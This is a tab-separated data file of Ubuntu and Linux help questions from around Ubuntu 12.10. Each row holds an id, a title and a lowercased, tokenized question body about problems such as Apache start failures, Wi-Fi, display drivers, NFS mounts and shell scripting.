206161	apache2 fails to start since 12.10	i updated from to 12.10 i came from 12.04 , but since then i ca n't restart apache2 . # service apache2 start * starting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : syntax error on line 214 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/httpd.conf : no such file or directory action 'start ' failed . the apache error log may have more information . my file httpd.conf is missing from /etc/apache2/ and i do n't know why . i reinstalled apache2 but nothing helps . so where is the httpd.conf file ? === edit === doing a locate httpd.conf it shows me in /etc/apache2/httpd.conf but doing ll in that folder it does n't show me anything ... doing nano /etc/apache2/httpd.conf it shows me an empty file ...
206164	php.ini shows `` magic_quotes_gpc = off '' but phpinfo shows it as 'on '	i am installing joomla . it reported that magic_quotes_gpc is switched on so i went to check out php.ini . in there it 's showing as off . i did a bit of googling and it turns out the server could be reading a different php.ini file and to check the 'loaded configuration ' section of phpinfo . so i did . it reports that it is loading the same file i looked at , and it ( phpinfo ) also reports magic_quotes_gpc as being on . does anyone know what could be causing two seperate entities ( joomla setup and phpinfo ) to report it as 'on ' but php.ini shows it as off ? edit : i figured out what was going on . there was an error earlier in php.ini which was causing the server not to parse the rest of the file .
206165	sd card wo n't mount when an android phone is connected after 12.10 fresh install	i just upgraded to 12.10 via a fresh install . mounting my xperia neo v in 12.04 worked flawlessly however i just discovered that the sd card ca n't be detected and mounted in 12.10 . how can i solve this ? thanks in advance . p. s. i can mount it via a card reader though and it mounts ok in windows 7 . so it surely ca n't be hardware related . edit : sony ericsson neo v running android 2.3.4 . usb mass storage is already turned on .
206166	how can i add icon/link to panel ?	how can i add shortcut icon to panel ? i use ubuntu 12.10 thanks .
206169	build ubuntu removing the unnecessary applications	there are many apps in ubuntu like vino , vinagre etc that sit idle on my pc and have no use . removing these apps does not remove the dependencies and hence take up space . this space is costlier when i have to run the system live for recovery or some other works . installing apps over the liverun takes up space in ram drive . hence i want to start from the kernel and build up ubuntu ( for every lts version ) that will have all the features of the os but will remove the apps i never need to use along with their dependencies , hence providing me a light distro customized for me entirely . i have previously heard of minimalcd for ubuntu but have never used . is that what is to be used for this kind of a project ?
206171	pae kernel error while installing 12.04	tried to install ubuntu 12.04 but getting an error : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . how do i resolve this ?
206182	eclipse juno ( 4.2.1 ) crashes frequently after upgrading to ubuntu12.10 from 12.04 ( both 64bits ) ?	i was using eclipse juno ( ver 4.2.1 ) on my 64bit ubuntu 12.04 for almost a month or more . it was working perfectly and i really enjoyed working on it . however two days back i upgraded my machine to ubuntu 12.10 since than eclipse juno is working strangely irritating . it crashes frequently . i even removed the old installation completely and reinstalled everything ( adt , subclipse , cdt etc . ) what could be the possible reason behind this ? how i solve it ?
206191	how to convert audio files in deadbeef player ?	i t looks like deadbeef player should convert between different audio formats just by right-clicking and selecting `` convert '' but after that and a few seconds of delay as if working nothing happens . has anybody used it successfully and how ?
206196	network does n't start on boot	i installed ubuntu server on a machine , and there is this thing which is annoying me : everytime i boot the machine , i have to sudo ifup p1p4 to start the network ... what should i do to make this automatically ?
206198	12.10 booting into variations of blank screen	i 've been running the ubuntu 12.10 beta since about a month before the final release with almost no problems . however since the day of release ( i 'm assuming an update has caused this ) i have had problems booting into the actual gui interface . trying to get it to work is just a case of hard shutting down until it works , but for most of the time i need to battle with various different kinds of black screens . these include a plain black screen , a flashing line and a flashing line that does n't fit the resolution . nine times out of ten the cursor will be displayed over these . it also sometimes manages to boot into ubuntu , albeit text mode or sometimes it loads grub which it is n't setup to do . if anyone could help out with this it 'd be great . i really , really do n't want to have to go through yet another clean installation . cheers .
206203	ubuntu one client 3.02b stuck at `` file sync starting '' on windows xp 32-bit	i have been using ubuntu one on natty on my laptop and ( sad ) win-xp 32-bit on my desktop . at first , the sync function worked well on both platforms but now it 's stuck at `` file sync starting '' on win-xp 32-bit . i have already tried to uninstall it completely ( removed device , deleted folder , restarted pc ) and reinstall it but no luck . it is able to display a list of `` my personal folders '' though . i did some google-ing and found someone had similar problem on win7 64-bit and some said the bug is resolved since version 3 . unfortunately that 's not the case for me . as the title suggests , i am running v3.02b on winxp . any help / comments would be greatly appreciated . thanks !
206206	ppa for eclipse juno 4.2	is there a ppa for eclipse juno 4.2 ? if not , would it be too difficult to create one , perhaps based on the official packaging ? i 'm on ubuntu 12.10 .
206209	ubuntu 12.10 unity wont start when i activate xinerama with 6 screens	i have 2 video cards . 1x hd7850 ( main video card ) 1x hd6450 i have installed the driver for ati amd beta 12.11 from amd website it works very good.. and than , i go in amd catalyst control to manage my displays . i place them all side by side ( 4 monitors ) they have been detected with the good resolution for each of monitors i have . than i reboot without activating xinerama yet ... i see now my 1st video card ( hd7850 ) show the unity bar with wallpaper that 's find . but the other video card ( hd6450 ) show me a white ( grey ) display on both monitors of the card ... if i drag my mouse to one of these monitors , i see a x pointer for my mouse and cant move to a another display anymore . i reboot ... i activate xinerama , and now i can see all wallpapers on all screens and my mouse can travel where i want . no more white display . very nice , all monitors working with the good resolution . but this is when unity wont start anymore : / i did unity -- replace and i get warning : no display variable set , setting it to :0 ( i still can see icons on desktop , move the mouse , right clic and see options from desktop ... but no panel bar ( unity ) ) anyone can help please ? thank you very much . jmcourir
206211	atheros 922 pci wifi is disabled in unity but enabled in terminal - how to get it to work ?	i am trying to get my pci wireless atheros 922 card to work . it is disabled in unity : both the network utility and the desktop ( see screenshot http : //www.amisdurailhalanzy.be/screenshot % 20from % 202012-10-25 % 2013:19:54.png ) i tried many different advises on many different forums . installed 12.10 instead of 12.04 , enabled all interfaces ... etc . i have read about the aht9 driver ... the terminal shows no hw or sw lock for the atheros card , nevertheless , it is still disabled . nothing worked so far , the card is still disabled . any help is much appreciated . here are more tech details : myuser @ adri1 : ~ $ sudo lshw -c network *-network:0 disabled description : wireless interface product : ar922x wireless network adapter vendor : atheros communications inc. physical id : 2 bus info : pci @ 0000:03:02.0 logical name : wlan1 version : 01 serial : 00:18 : e7 : cd:68 : b1 width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-17-generic firmware=n/a latency=168 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : d8000000-d800ffff *-network:1 description : ethernet interface product : vt6105/vt6106s [ rhine-iii ] vendor : via technologies , inc. physical id : 6 bus info : pci @ 0000:03:06.0 logical name : eth0 version : 8b serial : 00:11:09 : a3:76:4a size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=via-rhine driverversion=1.5.0 duplex=half latency=32 link=no maxlatency=8 mingnt=3 multicast=yes port=mii speed=10mbit/s resources : irq:18 ioport : d300 ( size=256 ) memory : d8013000-d80130ff *-network disabled description : wireless interface physical id : 1 bus info : usb @ 1:8.1 logical name : wlan0 serial : 00:11:09:51:75:36 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2500usb driverversion=3.5.0-17-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bg myuser @ adri1 : ~ $ sudo rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy1 : wireless lan soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no myuser @ adri1 : ~ $ dmesg | grep wlan0 [ 15.114235 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready myuser @ adri1 : ~ $ dmesg | egrep 'ath|firm' [ 14.617562 ] ath : eeprom regdomain : 0x30 [ 14.617568 ] ath : eeprom indicates we should expect a direct regpair map [ 14.617572 ] ath : country alpha2 being used : am [ 14.617575 ] ath : regpair used : 0x30 [ 14.637778 ] ieee80211 phy0 : > selected rate control algorithm 'ath9k_rate_control' [ 14.639410 ] registered led device : ath9k-phy0 myuser @ adri1 : ~ $ dmesg | grep wlan1 [ 15.119922 ] ipv6 : addrconf ( netdev_up ) : wlan1 : link is not ready myuser @ adri1 : ~ $ lspci -nn | grep 'atheros' 03:02.0 network controller [ 0280 ] : atheros communications inc. ar922x wireless network adapter [ 168c:0029 ] ( rev 01 ) myuser @ adri1 : ~ $ sudo ifconfig eth0 link encap : ethernet hwaddr 00:11:09 : a3:76:4a inet addr:192.168.2.2 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :211:9ff : fea3:764a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5457 errors:0 dropped:0 overruns:0 frame:0 tx packets:2548 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3425684 ( 3.4 mb ) tx bytes:282192 ( 282.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:590 errors:0 dropped:0 overruns:0 frame:0 tx packets:590 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:53729 ( 53.7 kb ) tx bytes:53729 ( 53.7 kb ) myuser @ adri1 : ~ $ sudo iwconfig wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on lo no wireless extensions . eth0 no wireless extensions . wlan1 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off myuser @ adri1 : ~ $ lsmod | grep `` ath9k '' ath9k 116549 0 mac80211 461161 3 rt2x00usb , rt2x00lib , ath9k ath9k_common 13783 1 ath9k ath9k_hw 376155 2 ath9k , ath9k_common ath 19187 3 ath9k , ath9k_common , ath9k_hw cfg80211 175375 4 rt2x00lib , ath9k , mac80211 , ath myuser @ adri1 : ~ $ iwlist scan wlan0 failed to read scan data : network is down lo interface does n't support scanning . eth0 interface does n't support scanning . wlan1 failed to read scan data : network is down myuser @ adri1 : ~ $ lsb_release -d description : ubuntu 12.10 myuser @ adri1 : ~ $ uname -mr 3.5.0-17-generic i686 ! [ schizophrenic ubuntu ] ( http : //www.amisdurailhalanzy.be/screenshot % 20from % 202012-10-25 % 2013:19:54.png ) any help much appreciated ... thanks , philippe 31-10-2012 ... i have some more updates . when i do the following command it does see my wifi router ... so even if it is still disabled ... the card seems to work and see the router ( essid : '' 5791bc26-ce9c-11d1-97bf-0000f81e '' ) see below : sudo iwlist wlan1 scanning wlan1 scan completed : cell 01 - address : 00:19:70:8f : b0 : ea channel:10 frequency:2.457 ghz ( channel 10 ) quality=51/70 signal level=-59 dbm encryption key : on essid : '' 5791bc26-ce9c-11d1-97bf-0000f81e '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000025dbf2188 extra : last beacon : 108ms ago ie : unknown : 002035373931424332362d434539432d313144312d393742462d3030303046383145 ie : unknown : 010882848b960c121824 ie : unknown : 03010a ie : unknown : 0706424520010d14 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd180050f2020101030003a4000027a4000042435e0062322f00 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd0a00037f04010000000000
206214	put to sleep if cpu temp over 65 bash script	i am new to scripting and linux , my comp gets too hot sometimes and i want to make a script to detect temp1 and if it 's over 65 c , it must put it to sleep . i have a diffuculty at comparing values in the script , i could n't manage to define figures correctly , would anybody fix it please ? here is my stab at it so far # ! /bin/bash max=65 val= $ sensors | grep '^temp1 : ' | sed -e 's/ . * : \+\ ( [ +- ] [ 0-9. ] \+\ ) 째c . * $ /0\1/' while true ; do if [ [ `` $ val '' > `` $ max '' ] ] then sudo /etc/acpi/sleep.sh force sleep 1 else sleep 10 fi clear sensors done
206215	unable to run internet in ubuntu 12.10	i have mts mblaze working fine till ubuntu 12.04.but now i have installed ubuntu 12.10 on the same desktop , but it does n't workwhy ?
206216	how to reset dual display to one screen from command line ?	how can i reset dual display to one screen from command line and set old second screen as main display ? ( 12.04 + nvidia )
206219	how to delete a google calendar from evolution ?	i just upgraded to 12.10 , i get an annoying asking for password for evolution calender ( i had added google calander a long time ago and i never use it ) i want to remove this calender , it wont leave me alone , i tried to purge evolution and delete all the files for evolution in gconf and local/share/evolution that didnt help i also tried this delete a calendar from evolution but it didnt work for me how can i make evolution and that annoyng asking for gmail password go away forever ... i never ever wan na use evolution and its calander .
206223	why are mounted iso 's not browseable via an nfs share/mount ?	try it out please : download an iso and place it in /data/iso eg : [ root @ geppetto ~ ] # ls -al /data/iso total 708620 drwxr-xr-x . 2 root root 4096 oct 17 14:40 . drwxr-xr-x . 3 root root 4096 oct 17 14:36 .. -rw-r -- r -- . 1 root root 725614592 jul 7 19:26 centos-6.3-x86_64-livecd.iso then mount it [ root @ geppetto ~ ] # mkdir -p /media/centos6.3-64-live [ root @ geppetto ~ ] # [ root @ geppetto ~ ] # mount -t iso9660 /data/iso/centos-6.3-x86_64-livecd.iso /media/centos6.3-64-live then export it 's parentdir via nfs , [ root @ geppetto ~ ] # cat /etc/exports /export/iso cal-26.oma.be ( ro ) [ root @ geppetto ~ ] # [ root @ geppetto ~ ] # service nfs reload [ root @ geppetto ~ ] # showmount -e export list for geppetto.oma.be : /export/iso cal-26.oma.be [ root @ geppetto ~ ] # then mount it on the client [ root @ cal-26 ~ ] # mount -v -t nfs puppet-me.oma.be : /export/iso /geppettoiso mount.nfs : timeout set for thu oct 25 13:39:16 2012 mount.nfs : trying text-based options 'vers=4 , addr=192.168.16.49 , clientaddr=192.168.15.194' [ root @ cal-26 ~ ] # on the nfs server it is browsable : [ root @ geppetto media ] # ls -al total 10 drwxr-xr-x . 3 root root 4096 oct 17 15:23 . dr-xr-xr-x . 26 root root 4096 oct 25 11:28 .. dr-xr-xr-x . 5 root root 2048 jul 7 19:23 centos6.3-64-live [ root @ geppetto media ] # [ root @ geppetto media ] # ls -al /media/centos6.3-64-live/ total 30 dr-xr-xr-x . 5 root root 2048 jul 7 19:23 . drwxr-xr-x . 3 root root 4096 oct 17 15:23 .. dr-xr-xr-x . 3 root root 2048 jul 7 19:22 efi -r -- r -- r -- . 1 root root 18416 jul 7 19:23 gpl dr-xr-xr-x . 2 root root 2048 jul 7 19:23 isolinux dr-xr-xr-x . 2 root root 2048 jul 7 19:24 liveos [ root @ geppetto media ] # but on the nfs client it looks just like if it is the original iso file : [ root @ cal-26 geppettoiso ] # ls -al /geppettoiso/centos-6.3-x86_64-livecd.iso -rw-r -- r -- . 1 root root 725614592 jul 7 19:26 /geppettoiso/centos-6.3-x86_64-livecd.iso [ root @ cal-26 geppettoiso ] # original file : [ root @ geppetto media ] # ls -al /data/iso/centos-6.3-x86_64-livecd.iso -rw-r -- r -- . 1 root root 725614592 jul 7 19:26 /data/iso/centos-6.3-x86_64-livecd.iso [ root @ geppetto media ] # just for completeness : [ root @ cal-26 geppettoiso ] # mount | grep -i iso puppet-me.oma.be : /export/iso on /geppettoiso type nfs4 ( rw , relatime , vers=4.0 , rsize=524288 , wsize=524288 , namlen=255 , hard , proto=tcp , port=0 , timeo=600 , retrans=2 , sec=sys , clientaddr=192.168.15.194 , local_lock=none , addr=192.168.16.49 ) [ root @ cal-26 geppettoiso ] # [ root @ geppetto media ] # mount | grep -i iso /data/iso/centos-6.3-x86_64-livecd.iso on /media/centos6.3-64-live type iso9660 ( ro , loop=/dev/loop0 ) /data/iso on /export/iso type none ( rw , bind ) [ root @ geppetto media ] #
206228	compiz has broken after installing 12.10 with ati catalyst 12.10 drivers	after upgrading to quantal yesterday i installed the new ati catalyst drivers , the 12.10 version , for my ati radeon hd 7850 card . upon logging into ubuntu i am presented with no unity . i can access terminal with ctrl + alt + t. i tried uninstalling the driver , but that did not fix compiz . does anyone know how i can fix compiz ? any info on getting drivers working would be good too . edit : i solved this problem by first uninstalling the proprietary driver through the terminal , which i believe is in /usr/share/ati/amd-uninstall.sh . then i rebooted and installed the open source driver , radeon , and rebooted again . it 's slower than the proprietary drivers but it works .
206230	how to install git on ubuntu ?	when i run this command : apt-get install git-core it shows : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
206235	fan very loud in ubuntu 12.10	i recently installed 12.10 on my desktop pc , moving away from windows 7 . for some reason , the fan in my computer is making an enormous amount of noise ( it is running at full speed constantly ) . under windows 7 , the fan would slow itself down and run at an acceptable noise level . now , it is nearly unbearable . checked the processes , and none are taking up a huge load on the cpu . please help as i really ca n't endure this noise , and i do not want to go back to windows 7 on this box . some specs : - intel 2.26 duo core - ati 4870 - 4gb - 650w power supply
206237	how can i keep two different font sizes on two different documents ?	i am using xubuntu and i need to keep document a with font size 8 and b with with font size 12 . if i save a with font size 8 , this switches the font size to 8 for all the other documents , including b . again , if i open b , turn the font to 12 and save the document this switches a too to 12 , and so on . this is rather boring . somebody could tell me how to fix this problem ? thanks edit : i am using the plain text editor of xubuntu .
206238	messaging menu integration for thunderbird does not work in ubuntu 12.10 anymore	since i have updated to 12.10 the messaging menu integration for thunderbird does not work anymore . what am i supposed to do ? does anybody else has experienced this problem ? which components are necessary for thunderbird to work with the message menu generally ? that means i have the messaging menu but neither evolution nor thunderbird show up there as they did before :
206240	battery is drained too quickly	i 'm getting really low battery life under ubuntu , not even close to windows . i tried powertop , and i saw that my laptop is consuming in idle nearly 20 watts ( a bit more ) . i tried to install laptop-mode-tools , change `` good '' into `` bad '' in powertop , but nothing changes . i see that i have the the hd audio output device which is running at 100 % every time . could this be the problem ? this is a report from powertop . the battery reports a discharge rate of 22.8 w the estimated remaining time is 33 minutes summary : 381.8 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec usage events/s category description 3.2 ms/s 182.7 timer tick_sched_timer 100.0 % device audio codec hwc0d3 : intel 7.9 ms/s 25.1 process /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background no 1.9 ms/s 24.2 interrupt [ 6 ] tasklet ( softirq ) 2.9 ms/s 23.2 process /usr/lib/chromium-browser/chromium-browser -- type=zygote 8.1 ms/s 20.3 process /usr/lib/unity/unity-panel-service 0.7 ms/s 17.4 timer hrtimer_wakeup 4.2 ms/s 12.6 process unity-2d-panel 604.4 µs/s 9.7 process syndaemon -i 2.0 -k -r -t 149.7 µs/s 9.7 kwork ieee80211_iface_work 0.8 ms/s 8.7 process metacity 19.5 ms/s 1.0 process powertop 3.0 ms/s 6.8 process //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 699.0 µs/s 6.8 process /usr/lib/thunderbird/thunderbird 4.3 ms/s 4.8 process gnome-terminal 658.9 µs/s 2.9 interrupt [ 1 ] timer ( softirq ) 75.1 µs/s 2.9 kwork iwl_bg_run_time_calib_work 163.8 µs/s 1.9 process /usr/lib/accountsservice/accounts-daemon 70.6 µs/s 1.9 process [ ksoftirqd/2 ] 25.8 µs/s 1.9 process [ ksoftirqd/0 ] 1.0 ms/s 1.0 process /usr/bin/python /usr/sbin/powernapd 408.2 µs/s 1.0 process unity-2d-shell 189.8 µs/s 1.0 process /usr/lib/chromium-browser/chromium-browser 124.4 µs/s 1.0 process /usr/lib/unity-lens-applications/unity-applications-daemon 113.3 µs/s 1.0 process /usr/lib/gnome-settings-daemon/gnome-settings-daemon 112.0 µs/s 1.0 process nautilus -n 104.9 µs/s 1.0 process /usr/lib/gvfs/gvfsd-trash -- spawner :1.2 /org/gtk/gvfs/exec_spaw/0 77.5 µs/s 1.0 process /usr/lib/x86_64-linux-gnu/colord/colord 75.6 µs/s 1.0 process /usr/lib/gvfs/gvfs-gdu-volume-monitor 75.0 µs/s 1.0 interrupt [ 53 ] i915 74.9 µs/s 1.0 process /usr/lib/gvfs/gvfs-afc-volume-monitor what should i do to make the battery consumption lower ?
206249	video converter for 3gp video ?	are there any converters around that allow conversion of flv/avi/mp4 videos to mobile 3gp format ? preferably gui based , but i have n't managed to find one yet .
206252	how to choose between 32-bit and 64-bit ubuntu using a bootloader ?	alright , so on an external hard drive , i plan to make multiple ubuntu installations . as some computers do not mesh well with trying to use a different hierarchy as far as i can understand , how can i make a bootloader on the said external hard drive to support being able to choose between 64-bit and 32-bit ? here 's the partitioning game plan i have drawn out : not-bootable : fat32 - 830gb `` obsidianwin '' bootable : ext4 - 50gb `` obsidian32 '' bootable : ext4 - 50gb `` obsidian64 '' swap space : swap - 2gb total usable space : 932gb if there needs to be another partition for the bootloader , then the fat32 can get shrinked - i really do n't mind/care , since the obsidianwin partition is basically for storage .
206261	how do i change the default permissions for automounted usb media ?	tl ; dr : how do i make gnome automount usb devices with permissions so that everyone in the group can access them instead of just one user that is logged in at the time the usb storage is plugged in ? ( here the group is called `` confus '' and the users `` narur '' and `` confus '' are both in that group . only narur was logged in , at time of usb plug in so only narur can access the usb device - even after a sudo chmod g+rw . how do i change that ? ) details : i run a media server at my home . it is connected to a projector as only monitor . form time to time i like to plug in a usb drive to copy stuff from the server to said drive . the drive gets auto-mounted by the usual gnome shenanigans . obviously i do n't want to turn on the projector ( take a while and is not good on the lamp ) . so i login to the server over ssh and do the copy over terminal from another pc . problem is , the usb drive gets mounted under a different user than the user i log in as via ssh . my ssh user does n't have the rights to open the mount point chosen by gnome although it is in the same group . for clarification see this terminal session : confus @ conserve : /media $ id uid=1000 ( confus ) gid=1000 ( confus ) groups=4 ( adm ) ,8 ( mail ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,113 ( lpadmin ) ,114 ( sambashare ) ,122 ( admin ) ,126 ( debian-transmission ) ,135 ( debian-tor ) ,1000 ( confus ) confus @ conserve : /media $ ll total 28 lrwxrwxrwx 1 root root 6 mar 8 2009 cdrom - > cdrom0 drwx -- -- -- 1 narur confus 4096 oct 8 16:53 contemplate # < -- usb drive drwxr-xr-x 2 root root 4096 may 3 2010 iso drwxr-xr-x 2 confus confus 4096 dec 8 2009 usb1 confus @ conserve : /media $ sudo chmod -r ug+rwx 4009-d44f/ # < -- does n't do anything [ sudo ] password for confus : confus @ conserve : /media $ ll total 28 lrwxrwxrwx 1 root root 6 mar 8 2009 cdrom - > cdrom0 drwx -- -- -- 1 narur confus 4096 oct 8 16:53 contemplate # < -- no change after chmod drwxr-xr-x 2 root root 4096 may 3 2010 iso drwxr-xr-x 2 confus confus 4096 dec 8 2009 usb1 my ssh user is `` confus '' while the disk is mounted for the user `` narur '' . obviously a simple chmod does n't do since its a mount point . the problem exists for every usb storage device . i know i could write a udev rule and i know that device based solutions exists . but there should be an easier solution to this problem , that 's native to gvfs . update : related post on superuser related launchpad bug another related launchpad bug . nothing has changed since 2009 . this is embarrassing . there should be an easy work around for this problem at least .
206263	dual graphic ( between graphic card and mainboard graphic )	can i do the dual graphic ( use two same monitor , the monitor 1 is next to monitor 2 , monitor 1 use the graphic card , monitor 2 the mainboard graphic ) on ubuntu ? what driver i should install to do the dual graphic ? mainboard graphic : hd2500 ( from intel core i5-3450 ) graphic card : ati radeon hd 4850
206267	how to install touchegg ?	i 'm trying to install touchegg but for some reason it does n't work . for now all i tried : sudo apt-get install touchegg edit ~/.config/touchegg/touchegg.conf ( what is the appropriate format ? plain text or xml ? ) how do i make it work ?
206268	how do i get a transparent page/screen in firefox ?	so , everytime i open a new tab ( about : newtab ) or just a white screen ( about : blank ) . it would be better , firefox displays my desktop instead ( or what 's 'behind ' firefox ) to work more efficient . i thought to try firefox 's add-on 'stylish ' to solve this problem , but those scripts are only for windows with aero support . so ... any other ideas how i get a transparent page/screen in firefox ? edit to clear things up : i do n't want the whole window transparent !
206269	subwoofer problem in hp envy	i bought a hp envy 6-1060ss , it has 2 front speakers and a built-in subwoofer . i ca n't get the subwoofer to work . i have looked around for answers , and found quite a lot , but still , nothing works . i have already tried ( from already answered questions ) : edited /etc/pulse/daemon.conf setting enable-lfe-remixing : from no to yes , and the channels number from 2 to 3 . edited /etc/modprobe.d/alsa-base.conf , adding options snd-hda-intel model=hp-zephyr and options snd-hda-intel model=ref . any other thoughts ?
206271	how can i bypass this fontconfig warning to edit grub successfully ?	i upgraded from 12.04 to 12.10 with no problem . i am trying to edit the grub file , but in the console i get the following message : fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated as a result , i see nothing when the editor opens . is there a fix for this ? i ca n't find much information on google .
206275	how to make ubuntu recognize an unknown external display ( so i can adjust its resolution ) ?	i have a dell laptop with an external monitor attached ( a samsumg syncmaster 931c ) . my laptop display was recognized , and i can adjust its optimum resolution . my external display is still unknown , thus i 'm stuck at a lower resolution ( 1024x768 ) : i tried the `` detect displays '' button , but it did n't work , nothing happens . i recently upgraded from ubuntu 12.04 to 12.10 . things were working before . i do n't know if i can actually change this configuration , or if this is a bug . i searched for an answer here and also in launchpad 's website , but found none . i even tried to install nvidia drivers , and just messed things up . it seems i was n't even using nvidia before , as i guessed by looking at my additional drivers configuration : my laptop has an intel chipset , i guess : $ dpkg -- get-selections | grep -i -e nvidia -e intel intel-gpu-tools install libdrm-intel1 : amd64 install libdrm-intel1 : i386 install nvidia-common install xserver-xorg-video-intel install i do n't have an xorg.conf file ( i think this is nvidia related , am i right ? ) : $ cat /etc/x11/xorg.conf cat : /etc/x11/xorg.conf : no such file or directory $ ls -l /etc/x11/ total 76 drwxr-xr-x 2 root root 4096 out 19 23:41 app-defaults drwxr-xr-x 2 root root 4096 abr 25 2012 cursors -rw-r -- r -- 1 root root 18 abr 25 2012 default-display-manager drwxr-xr-x 4 root root 4096 abr 25 2012 fonts -rw-r -- r -- 1 root root 17394 dez 3 2009 rgb.txt lrwxrwxrwx 1 root root 13 mai 1 03:33 x - > /usr/bin/xorg drwxr-xr-x 3 root root 4096 out 19 23:41 xinit drwxr-xr-x 2 root root 4096 jan 23 2012 xkb -rw-r -- r -- 1 root root 0 out 24 08:55 xorg.conf.nvidia-xconfig-original -rwxr-xr-x 1 root root 709 abr 1 2010 xreset drwxr-xr-x 2 root root 4096 out 19 10:08 xreset.d drwxr-xr-x 2 root root 4096 out 19 10:08 xresources -rwxr-xr-x 1 root root 3730 jan 20 2012 xsession drwxr-xr-x 2 root root 4096 out 20 00:11 xsession.d -rw-r -- r -- 1 root root 265 jul 1 2008 xsession.options -rw-r -- r -- 1 root root 13 ago 15 06:43 xvmcconfig -rw-r -- r -- 1 root root 601 abr 25 2012 xwrapper.config here is some information i gathered by looking at other related posts : $ sudo lshw -c display ; lsb_release -a ; uname -a *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:48 memory : f6800000-f6bfffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f6100000-f61fffff lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : qt4-3.1-amd64 : qt4-3.1-noarch distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal linux batcave 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ xrandr -q screen 0 : minimum 320 x 200 , current 2304 x 800 , maximum 32767 x 32767 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 286mm x 1790mm 1280x800 59.9*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+1280+32 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) if there 's anything else i can do , any other information i can post here , to help me configure this external display , please let me know . if this is actually a bug , i apologize ( i know bugs are not allowed here ) , but i really was n't sure . and i will promptly file a bug report in launchpad if that 's the case . thanks a lot in advance . ; )
206276	the installer says that there is not enough space on the disk	despite the fact that i don t have anything installed on the disk , the installer says there is not enough space in the disk . the `` try option '' works ok. any thoughts ?
206277	find files in linux and exclude specific directories	i have a find looking like this : rm -f crush-all.js find . -type f \ ( -name `` *.js '' ! -name `` *-min* '' ! -name `` *console* '' \ ) | while read line do cat `` $ line '' > > crush-all.js echo > > crush-all.js done i 'd like to add to exclude a directory called `` test '' in the find but i ca n't seem to figure out how to add `` -type d '' somehow . how 'd i go about doing that ? thanks !
